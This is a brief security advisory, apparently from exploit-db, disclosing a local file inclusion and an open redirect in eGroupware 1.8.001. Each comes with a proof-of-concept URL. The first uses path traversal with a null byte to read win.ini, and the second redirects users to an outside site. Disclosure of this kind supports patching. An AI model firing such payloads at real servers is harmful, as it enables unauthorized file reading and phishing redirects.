------------------------------------------------------------------------
Software................eGroupware 1.8.001.20110421 |
Vulnerability...........Local File Inclusion |
Threat Level............Critical (4/5) |
Download................http://www.egroupware.org/ |
Discovery Date..........5/19/2011 |
Tested On...............Windows Vista + XAMPP |
------------------------------------------------------------------------ |
Author..................AutoSec Tools |
Site....................http://www.autosectools.com/ |
Email...................John Leitch <john@autosectools.com> |
------------------------------------------------------------------------ |
A local file inclusion vulnerability in eGroupware 1.8.001.20110421 |
can be exploited to include arbitrary files. |
http://localhost/egroupware/admin/remote.php?uid=a&type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg&creator_email=a |
------------------------------------------------------------------------ |
Software................eGroupware 1.8.001.20110421 |
Vulnerability...........Open Redirect |
Threat Level............Low (1/5) |
Download................http://www.egroupware.org/ |
Discovery Date..........5/19/2011 |
Tested On...............Windows Vista + XAMPP |
------------------------------------------------------------------------ |
Author..................AutoSec Tools |
Site....................http://www.autosectools.com/ |
Email...................John Leitch <john@autosectools.com> |
------------------------------------------------------------------------ |
An open redirect in eGroupware 1.8.001.20110421 can be exploited to |
redirect users to an arbitrary URL. |
http://localhost/egroupware/phpgwapi/ntlm/index.php?forward=http://www.autosectools.com/
Fonte: http://www.exploit-db.com/exploits/17322/